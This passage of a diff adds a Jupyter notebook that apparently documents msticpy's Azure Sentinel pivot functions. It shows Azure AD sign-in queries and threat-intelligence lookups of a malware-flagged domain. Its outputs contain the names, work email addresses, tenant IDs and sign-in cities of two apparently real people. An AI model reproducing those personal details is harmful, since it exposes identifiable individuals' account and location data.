+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>Azure AD</td>\n",
+       "      <td>2020-10-01 11:19:36.626000+00:00</td>\n",
+       "      <td>/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam</td>\n",
+       "      <td>Sign-in activity</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>SignInLogs</td>\n",
+       "      <td>0</td>\n",
+       "      <td>None</td>\n",
+       "      <td></td>\n",
+       "      <td>0</td>\n",
+       "      <td>4bdf65b2-99af-4bd4-ab7c-ffbc5a1d5038</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td></td>\n",
+       "      <td>Mor Shabi</td>\n",
+       "      <td>4</td>\n",
+       "      <td>IL</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Portal</td>\n",
+       "      <td>c44b4083-3bb0-49c1-b47d-974e53cbdf3c</td>\n",
+       "      <td>[]</td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"key\": \"Login Hint Present\",\\r\\n    \"value\": \"True\"\\r\\n  },\\r\\n  {\\r\\n    \"key\":...</td>\n",
+       "      <td>multiFactorAuthentication</td>\n",
+       "      <td>...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{'city': 'Herzliya', 'state': 'Tel Aviv', 'countryOrRegion': 'IL', 'geoCoordinates': {'latitude'...</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>4a40c63d-5e43-4af0-a0e5-2ae5df81e500</td>\n",
+       "      <td>3600</td>\n",
+       "      <td>none</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>Windows Azure Service Management API</td>\n",
+       "      <td>797f4846-ba00-4fd7-ba43-dac1f8f63013</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}</td>\n",
+       "      <td></td>\n",
+       "      <td>AzureAD</td>\n",
+       "      <td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.418...</td>\n",
+       "      <td>Mor Shabi</td>\n",
+       "      <td>7b77cfef-7ac7-4121-a834-561291927ad1</td>\n",
+       "      <td>moshabi@microsoft.com</td>\n",
+       "      <td>4b2462a4-bbee-495a-a0e1-f23ae524cc9c</td>\n",
+       "      <td>SigninLogs</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>Azure AD</td>\n",
+       "      <td>2020-10-01 11:19:40.787000+00:00</td>\n",
+       "      <td>/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam</td>\n",
+       "      <td>Sign-in activity</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>SignInLogs</td>\n",
+       "      <td>0</td>\n",
+       "      <td>None</td>\n",
+       "      <td></td>\n",
+       "      <td>0</td>\n",
+       "      <td>4460b859-84c1-4751-bddb-b305516cbed4</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td></td>\n",
+       "      <td>Mor Shabi</td>\n",
+       "      <td>4</td>\n",
+       "      <td>IL</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Portal</td>\n",
+       "      <td>c44b4083-3bb0-49c1-b47d-974e53cbdf3c</td>\n",
+       "      <td>[]</td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"key\": \"Login Hint Present\",\\r\\n    \"value\": \"True\"\\r\\n  },\\r\\n  {\\r\\n    \"key\":...</td>\n",
+       "      <td>singleFactorAuthentication</td>\n",
+       "      <td>...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{'city': 'Herzliya', 'state': 'Tel Aviv', 'countryOrRegion': 'IL', 'geoCoordinates': {'latitude'...</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>4a40c63d-5e43-4af0-a0e5-2ae5c182e500</td>\n",
+       "      <td>1526</td>\n",
+       "      <td>none</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>Windows Azure Service Management API</td>\n",
+       "      <td>797f4846-ba00-4fd7-ba43-dac1f8f63013</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>{'errorCode': 0}</td>\n",
+       "      <td></td>\n",
+       "      <td>AzureAD</td>\n",
+       "      <td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.418...</td>\n",
+       "      <td>Mor Shabi</td>\n",
+       "      <td>7b77cfef-7ac7-4121-a834-561291927ad1</td>\n",
+       "      <td>moshabi@microsoft.com</td>\n",
+       "      <td>4b2462a4-bbee-495a-a0e1-f23ae524cc9c</td>\n",
+       "      <td>SigninLogs</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>3 rows × 59 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId SourceSystem  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d     Azure AD   \n",
+       "1  8ecf8077-cf51-4820-aadd-14040956f35d     Azure AD   \n",
+       "2  8ecf8077-cf51-4820-aadd-14040956f35d     Azure AD   \n",
+       "\n",
+       "                     TimeGenerated  \\\n",
+       "0 2020-10-01 11:04:42.689000+00:00   \n",
+       "1 2020-10-01 11:19:36.626000+00:00   \n",
+       "2 2020-10-01 11:19:40.787000+00:00   \n",
+       "\n",
+       "                                                                 ResourceId  \\\n",
+       "0  /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam   \n",
+       "1  /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam   \n",
+       "2  /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam   \n",
+       "\n",
+       "      OperationName OperationVersion    Category ResultType ResultSignature  \\\n",
+       "0  Sign-in activity              1.0  SignInLogs          0            None   \n",
+       "1  Sign-in activity              1.0  SignInLogs          0            None   \n",
+       "2  Sign-in activity              1.0  SignInLogs          0            None   \n",
+       "\n",
+       "  ResultDescription  DurationMs                         CorrelationId  \\\n",
+       "0                             0  2e6fd17c-1227-433e-b3a3-80a74374a7dc   \n",
+       "1                             0  4bdf65b2-99af-4bd4-ab7c-ffbc5a1d5038   \n",
+       "2                             0  4460b859-84c1-4751-bddb-b305516cbed4   \n",
+       "\n",
+       "           Resource     ResourceGroup ResourceProvider     Identity Level  \\\n",
+       "0  Microsoft.aadiam  Microsoft.aadiam                   Ofer Shezaf     4   \n",
+       "1  Microsoft.aadiam  Microsoft.aadiam                     Mor Shabi     4   \n",
+       "2  Microsoft.aadiam  Microsoft.aadiam                     Mor Shabi     4   \n",
+       "\n",
+       "  Location AlternateSignInName AppDisplayName  \\\n",
+       "0       IL                       Azure Portal   \n",
+       "1       IL                       Azure Portal   \n",
+       "2       IL                       Azure Portal   \n",
+       "\n",
+       "                                  AppId AuthenticationDetails  \\\n",
+       "0  c44b4083-3bb0-49c1-b47d-974e53cbdf3c                    []   \n",
+       "1  c44b4083-3bb0-49c1-b47d-974e53cbdf3c                    []   \n",
+       "2  c44b4083-3bb0-49c1-b47d-974e53cbdf3c                    []   \n",
+       "\n",
+       "  AuthenticationMethodsUsed  \\\n",
+       "0                             \n",
+       "1                             \n",
+       "2                             \n",
+       "\n",
+       "                                                                       AuthenticationProcessingDetails  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"key\": \"Login Hint Present\",\\r\\n    \"value\": \"True\"\\r\\n  },\\r\\n  {\\r\\n    \"key\":...   \n",
+       "1  [\\r\\n  {\\r\\n    \"key\": \"Login Hint Present\",\\r\\n    \"value\": \"True\"\\r\\n  },\\r\\n  {\\r\\n    \"key\":...   \n",
+       "2  [\\r\\n  {\\r\\n    \"key\": \"Login Hint Present\",\\r\\n    \"value\": \"True\"\\r\\n  },\\r\\n  {\\r\\n    \"key\":...   \n",
+       "\n",
+       "    AuthenticationRequirement  ... IsRisky  \\\n",
+       "0   multiFactorAuthentication  ...    None   \n",
+       "1   multiFactorAuthentication  ...    None   \n",
+       "2  singleFactorAuthentication  ...    None   \n",
+       "\n",
+       "                                                                                       LocationDetails  \\\n",
+       "0  {'city': 'Tiberias', 'state': 'Hazafon', 'countryOrRegion': 'IL', 'geoCoordinates': {'latitude':...   \n",
+       "1  {'city': 'Herzliya', 'state': 'Tel Aviv', 'countryOrRegion': 'IL', 'geoCoordinates': {'latitude'...   \n",
+       "2  {'city': 'Herzliya', 'state': 'Tel Aviv', 'countryOrRegion': 'IL', 'geoCoordinates': {'latitude'...   \n",
+       "\n",
+       "  MfaDetail NetworkLocationDetails                     OriginalRequestId  \\\n",
+       "0        {}                     []  c8bfc04f-28bf-40b4-a9c1-07fd5bd9f800   \n",
+       "1        {}                     []  4a40c63d-5e43-4af0-a0e5-2ae5df81e500   \n",
+       "2        {}                     []  4a40c63d-5e43-4af0-a0e5-2ae5c182e500   \n",
+       "\n",
+       "  ProcessingTimeInMilliseconds  RiskDetail RiskEventTypes RiskEventTypes_V2  \\\n",
+       "0                          918        none             []                []   \n",
+       "1                         3600        none             []                []   \n",
+       "2                         1526        none             []                []   \n",
+       "\n",
+       "  RiskLevelAggregated RiskLevelDuringSignIn RiskState  \\\n",
+       "0                none                  none      none   \n",
+       "1                none                  none      none   \n",
+       "2                none                  none      none   \n",
+       "\n",
+       "                    ResourceDisplayName                      ResourceIdentity  \\\n",
+       "0  Windows Azure Service Management API  797f4846-ba00-4fd7-ba43-dac1f8f63013   \n",
+       "1  Windows Azure Service Management API  797f4846-ba00-4fd7-ba43-dac1f8f63013   \n",
+       "2  Windows Azure Service Management API  797f4846-ba00-4fd7-ba43-dac1f8f63013   \n",
+       "\n",
+       "  ServicePrincipalId ServicePrincipalName  \\\n",
+       "0                                           \n",
+       "1                                           \n",
+       "2                                           \n",
+       "\n",
+       "                                                                                     Status  \\\n",
+       "0  {'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}   \n",
+       "1  {'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}   \n",
+       "2                                                                          {'errorCode': 0}   \n",
+       "\n",
+       "  TokenIssuerName TokenIssuerType  \\\n",
+       "0                         AzureAD   \n",
+       "1                         AzureAD   \n",
+       "2                         AzureAD   \n",
+       "\n",
+       "                                                                                             UserAgent  \\\n",
+       "0  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.418...   \n",
+       "1  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.418...   \n",
+       "2  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.418...   \n",
+       "\n",
+       "  UserDisplayName                                UserId  \\\n",
+       "0     Ofer Shezaf  9c459db5-0407-43fe-a2ea-126757297beb   \n",
+       "1       Mor Shabi  7b77cfef-7ac7-4121-a834-561291927ad1   \n",
+       "2       Mor Shabi  7b77cfef-7ac7-4121-a834-561291927ad1   \n",
+       "\n",
+       "        UserPrincipalName                           AADTenantId        Type  \n",
+       "0  ofshezaf@microsoft.com  4b2462a4-bbee-495a-a0e1-f23ae524cc9c  SigninLogs  \n",
+       "1   moshabi@microsoft.com  4b2462a4-bbee-495a-a0e1-f23ae524cc9c  SigninLogs  \n",
+       "2   moshabi@microsoft.com  4b2462a4-bbee-495a-a0e1-f23ae524cc9c  SigninLogs  \n",
+       "\n",
+       "[3 rows x 59 columns]"
+      ]
+     },
+     "execution_count": 33,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "accounts = [\n",
+    "    \"ofshezaf\",\n",
+    "    \"moshabi\",\n",
+    "]\n",
+    "Account.AzureSentinel.list_aad_signins_for_account(account_name=accounts)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Combining multiple iterables and single-valued parameters\n",
+    "\n",
+    "The same rules as outline earlier for multiple parameters of different types apply to data queries"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 34,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>UserPrincipalName</th>\n",
+       "      <th>Identity</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>ofshezaf@microsoft.com</td>\n",
+       "      <td>Ofer Shezaf</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>moshabi@microsoft.com</td>\n",
+       "      <td>Mor Shabi</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>moshabi@microsoft.com</td>\n",
+       "      <td>Mor Shabi</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "        UserPrincipalName     Identity\n",
+       "0  ofshezaf@microsoft.com  Ofer Shezaf\n",
+       "1   moshabi@microsoft.com    Mor Shabi\n",
+       "2   moshabi@microsoft.com    Mor Shabi"
+      ]
+     },
+     "execution_count": 34,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "project = \"| project UserPrincipalName, Identity\"\n",
+    "Account.AzureSentinel.list_aad_signins_for_account(account_name=accounts, add_query_items=project)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Using DataFrames as input\n",
+    "\n",
+    "This is similar to using dataframes for other pivot functions.\n",
+    "\n",
+    "We must use the `data` parameter to specify the input dataframe.\n",
+    "You supply the column name from your input dataframe as the value of\n",
+    "the parameters expected by the function."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 35,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>User</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>ofshezaf</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>moshabi</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "       User\n",
+       "0  ofshezaf\n",
+       "1   moshabi"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "account_df = pd.DataFrame(accounts, columns=[\"User\"])\n",
+    "display(account_df)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Now we have our dataframe:\n",
+    "\n",
+    "- we specify `account_df` as the value of the `data` parameter.\n",
+    "- in our source (input) dataframe, the column that we want to use as the input value for each query is `User`\n",
+    "- we specify that column name as the value of the function parameter\n",
+    "\n",
+    "On each iteration, the column value from a subsequent row will be extracted and \n",
+    "given as the parameter value for the function parameter.\n",
+    "\n",
+    "> Note:<br> \n",
+    "> If the function parameter type is a \"list\" type - i.e. it expects a list of values<br>\n",
+    "> the parameter value will be sent as a list and only a single query is executed.<br>\n",
+    "> If the query function has multiple \"list\" type parameters, these will be<br>\n",
+    "> populated in the same way.\n",
+    "\n",
+    "> Note2:<br>\n",
+    "> If you have multiple parameters fed by multiple input columns AND one or more<br>\n",
+    "> of the function parameters *is not* a list type, the the query will be broken<br>\n",
+    "> into queries for each row. Each sub-query getting its values from a single row<br>\n",
+    "> of the input dataframe."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 36,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>UserPrincipalName</th>\n",
+       "      <th>Identity</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>ofshezaf@microsoft.com</td>\n",
+       "      <td>Ofer Shezaf</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>moshabi@microsoft.com</td>\n",
+       "      <td>Mor Shabi</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>moshabi@microsoft.com</td>\n",
+       "      <td>Mor Shabi</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "        UserPrincipalName     Identity\n",
+       "0  ofshezaf@microsoft.com  Ofer Shezaf\n",
+       "1   moshabi@microsoft.com    Mor Shabi\n",
+       "2   moshabi@microsoft.com    Mor Shabi"
+      ]
+     },
+     "execution_count": 36,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "Account.AzureSentinel.list_aad_signins_for_account(data=account_df, account_name=\"User\", add_query_items=project)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Threat Intelligence Lookups\n",
+    "\n",
+    "These work in the same way as the functions described earlier. However,\n",
+    "there are a few peculiarities of the Threat Intel functions:\n",
+    "\n",
+    "### Provider-specific functions\n",
+    "Queries for individual providers are broken out into separate functions\n",
+    "You will see multiple `lookup_ipv4` functions, for example: one with no suffix\n",
+    "and one for each individual TI provider with a corresponding suffix.\n",
+    "This is a convenience to let you use a specific provider more quickly. You\n",
+    "can still use the generic function (`lookup_ipv4`) and supply a providers parameter\n",
+    "to indicate which providers you want to use.\n",
+    "\n",
+    "### IPV4 and IPV6\n",
+    "Some providers treat these interchangably and use the same endpoint for both.\n",
+    "Other providers do not explicitly support IPV6 (e.g. the Tor exit nodes provider).\n",
+    "Still others (notably OTX) use different endpoints for IPv4 and IPv6.\n",
+    "\n",
+    "If you are querying IPv4 you can use either the `lookup_ip` function or one\n",
+    "of the `lookup_ipv4` functions. In most cases, you can also use these functions\n",
+    "for a mixture of IPv4 and v6 addresses. However, in cases where a provider\n",
+    "does not support IPv6 or uses a different endpoint for IPv6 queries you\n",
+    "will get no responses.\n",
+    "\n",
+    "### Entity mapping to IoC Types\n",
+    "This table shows the mapping between and entity type\n",
+    "and IoC Types:\n",
+    "\n",
+    "| Entity     |  IoCType           |\n",
+    "| :--------- | :----------------- |\n",
+    "| IpAddress  | ipv4, ipv6         |\n",
+    "| Dns        | domain             |\n",
+    "| File       | filehash (incl     |\n",
+    "|            | md5, sha1, sha256) |\n",
+    "| Url        | url                |\n",
+    "\n",
+    "> Note: Where you are using a File entity as a parameter, there is a complication.<br>\n",
+    "> A file entity can have multiple hash values (md5, sha1, sha256 and even sha256 authenticode).<br>\n",
+    "> The `file_hash` attibute of File is used as the default parameter.<br>\n",
+    "> In cases where a file has multiple hashes the highest priority hash (in order<br>\n",
+    "> sha256, sha1, md5, sha256ac) is returned.<br>\n",
+    "> If you are not using file entities as parameters (and specifying the input values<br>\n",
+    "> explicitly or via a Dataframe or iterable, you can ignore this."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 37,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "lookup_ip function\n",
+      "lookup_ipv4 function\n",
+      "lookup_ipv4_OTX function\n",
+      "lookup_ipv4_Tor function\n",
+      "lookup_ipv4_VirusTotal function\n",
+      "lookup_ipv4_XForce function\n",
+      "lookup_ipv6 function\n",
+      "lookup_ipv6_OTX function\n"
+     ]
+    }
+   ],
+   "source": [
+    "IpAddress.ti()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 38,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Ioc</th>\n",
+       "      <th>IocType</th>\n",
+       "      <th>SafeIoc</th>\n",
+       "      <th>QuerySubtype</th>\n",
+       "      <th>Provider</th>\n",
+       "      <th>Result</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Details</th>\n",
+       "      <th>RawResult</th>\n",
+       "      <th>Reference</th>\n",
+       "      <th>Status</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>None</td>\n",
+       "      <td>OTX</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'pulse_count': 35, 'names': ['Jaff - Malware Domain Feed V2', 'Jaff - Malware Domain Feed V2', ...</td>\n",
+       "      <td>{'sections': ['general', 'geo', 'url_list', 'passive_dns', 'malware', 'whois', 'http_scans'], 'w...</td>\n",
+       "      <td>https://otx.alienvault.com/api/v1/indicators/domain/fkksjobnn43.org/general</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>dns</td>\n",
+       "      <td></td>\n",
+       "      <td>None</td>\n",
+       "      <td>OPR</td>\n",
+       "      <td>True</td>\n",
+       "      <td>warning</td>\n",
+       "      <td>{'rank': None, 'error': 'Domain not found'}</td>\n",
+       "      <td>{'status_code': 404, 'error': 'Domain not found', 'page_rank_integer': 0, 'page_rank_decimal': 0...</td>\n",
+       "      <td>https://openpagerank.com/api/v1.0/getPageRank?domains[0]=fkksjobnn43.org</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>None</td>\n",
+       "      <td>VirusTotal</td>\n",
+       "      <td>True</td>\n",
+       "      <td>information</td>\n",
+       "      <td>{'verbose_msg': 'Domain found in dataset', 'response_code': 1, 'detected_urls': ['http://fkksjob...</td>\n",
+       "      <td>{'undetected_downloaded_samples': [], 'whois_timestamp': 1607400917, 'detected_downloaded_sample...</td>\n",
+       "      <td>https://www.virustotal.com/vtapi/v2/domain/report</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>None</td>\n",
+       "      <td>XForce</td>\n",
+       "      <td>True</td>\n",
+       "      <td>information</td>\n",
+       "      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n",
+       "      <td>{'result': {'url': 'fkksjobnn43.org', 'cats': {'General Business': True}, 'score': 1, 'categoryD...</td>\n",
+       "      <td>https://api.xforce.ibmcloud.com/url/fkksjobnn43.org</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "               Ioc IocType          SafeIoc QuerySubtype    Provider  Result  \\\n",
+       "0  fkksjobnn43.org     dns  fkksjobnn43.org         None         OTX    True   \n",
+       "0  fkksjobnn43.org     dns                          None         OPR    True   \n",
+       "0  fkksjobnn43.org     dns  fkksjobnn43.org         None  VirusTotal    True   \n",
+       "0  fkksjobnn43.org     dns  fkksjobnn43.org         None      XForce    True   \n",
+       "\n",
+       "      Severity  \\\n",
+       "0         high   \n",
+       "0      warning   \n",
+       "0  information   \n",
+       "0  information   \n",
+       "\n",
+       "                                                                                               Details  \\\n",
+       "0  {'pulse_count': 35, 'names': ['Jaff - Malware Domain Feed V2', 'Jaff - Malware Domain Feed V2', ...   \n",
+       "0                                                          {'rank': None, 'error': 'Domain not found'}   \n",
+       "0  {'verbose_msg': 'Domain found in dataset', 'response_code': 1, 'detected_urls': ['http://fkksjob...   \n",
+       "0  {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n",
+       "\n",
+       "                                                                                             RawResult  \\\n",
+       "0  {'sections': ['general', 'geo', 'url_list', 'passive_dns', 'malware', 'whois', 'http_scans'], 'w...   \n",
+       "0  {'status_code': 404, 'error': 'Domain not found', 'page_rank_integer': 0, 'page_rank_decimal': 0...   \n",
+       "0  {'undetected_downloaded_samples': [], 'whois_timestamp': 1607400917, 'detected_downloaded_sample...   \n",
+       "0  {'result': {'url': 'fkksjobnn43.org', 'cats': {'General Business': True}, 'score': 1, 'categoryD...   \n",
+       "\n",
+       "                                                                     Reference  \\\n",
+       "0  https://otx.alienvault.com/api/v1/indicators/domain/fkksjobnn43.org/general   \n",
+       "0     https://openpagerank.com/api/v1.0/getPageRank?domains[0]=fkksjobnn43.org   \n",
+       "0                            https://www.virustotal.com/vtapi/v2/domain/report   \n",
+       "0                          https://api.xforce.ibmcloud.com/url/fkksjobnn43.org   \n",
+       "\n",
+       "   Status  \n",
+       "0       0  \n",
+       "0       0  \n",
+       "0       0  \n",
+       "0       0  "
+      ]
+     },
+     "execution_count": 38,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "from msticpy.datamodel.entities import Url, Dns, File\n",
+    "dns = Dns(DomainName=\"fkksjobnn43.org\")\n",
+    "\n",
+    "Dns.ti.lookup_dns(dns)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 39,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
